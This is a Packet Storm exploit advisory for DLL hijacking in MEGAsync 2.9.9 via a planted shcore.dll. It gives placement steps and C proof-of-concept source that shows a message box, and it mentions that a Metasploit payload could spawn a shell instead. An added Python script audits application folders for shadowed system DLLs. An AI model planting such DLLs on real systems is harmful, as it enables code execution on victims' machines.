MEGAsync 2.9.9 DLL Hijacking

2016-08-29T00:00:00
ID PACKETSTORM:138543
Type packetstorm
Reporter Amir.ght
Modified 2016-08-29T00:00:00

Description

                                        
`# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll)  
# Date: 27-8-2016  
# Author: Amir.ght  
# Vendor Homepage: https://mega.nz  
# Software Link: https://mega.nz/MEGAsyncSetup.exe  
# Version: 2.9.9  
# Tested on: Windows 7  
----------------------------------------------------------------------------------------------------------  
Vuln DLL: shcore.dll  
  
MEGAsync.exe will search for and load any DLL named "shcore.dll".  
If an attacker can place the DLL in a location  
where the victim opens MEGAsync.exe, it will load and run the attacker's DLL  
and code.  
An attacker can also generate a msfpayload DLL and spawn a shell, for example.  
  
----------------------------------------------------------------------------------------------------------  
# Exploit:   
1- Save and compile the C code below as 'shcore.dll' to create the vuln DLL  
  
2- Place 'shcore.dll' in the same directory as MEGAsync  
  
3- Open MEGAsync.exe :DLL  
  
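//gcc test.c -o shcore.dll -shared  
//this DLL shows a message box  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
  
// Declared before DllMain so the call below compiles without an implicit declaration  
int dll_hijack(void);  
  
// Entry point the loader calls when the DLL is mapped into the process  
BOOL WINAPI DllMain (  
    HINSTANCE hinstDLL,  
    DWORD fdwReason,  
    LPVOID lpvReserved)  
{  
    dll_hijack();  
    return 0;  
}  
  
// Shows a message box to demonstrate that the DLL's code ran  
int dll_hijack(void)  
{  
    MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);  
    return 0;  
}  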
`
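
A defensive check for the condition described above, as an added example that is not part of the original advisory: it lists DLLs in an application directory that carry the name of an OS-supplied DLL, either because the same name exists in the system directory or because it is on a watchlist of names the application is known to probe for (here `shcore.dll`, from the advisory). The function name `audit_app_dir`, the watchlist parameter and the default system path are assumptions made for illustration.

```python
import hashlib
import os
import sys

def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def audit_app_dir(app_dir, system_dir, watchlist=("shcore.dll",)):
    """Return [(dll_name, verdict)] for DLLs in app_dir that would be loaded
    in place of an OS-supplied DLL of the same name."""
    watch = {n.lower() for n in watchlist}
    # Windows file names are case-insensitive, so compare lowercased names.
    system = {}
    if os.path.isdir(system_dir):
        system = {n.lower(): os.path.join(system_dir, n) for n in os.listdir(system_dir)}
    findings = []
    for name in sorted(os.listdir(app_dir)):
        key = name.lower()
        path = os.path.join(app_dir, name)
        if not key.endswith(".dll") or not os.path.isfile(path):
            continue
        if key in system and os.path.isfile(system[key]):
            same = _sha256(path) == _sha256(system[key])
            verdict = "identical to system copy" if same else "differs from system copy"
        elif key in watch:
            verdict = "watchlisted name, no system copy"
        else:
            continue  # the application's own DLL, not a known OS name
        findings.append((name, verdict))
    return findings

if __name__ == "__main__":
    # Assumed invocation: audit.py <application directory> [system directory]
    app = sys.argv[1]
    sysdir = sys.argv[2] if len(sys.argv) > 2 else r"C:\Windows\System32"
    for name, verdict in audit_app_dir(app, sysdir):
        print(f"{name}: {verdict}")
```

A name match is a lead rather than a verdict: applications legitimately ship private copies of some runtime DLLs, so follow up on "differs" and "no system copy" results by checking the file's signature and origin.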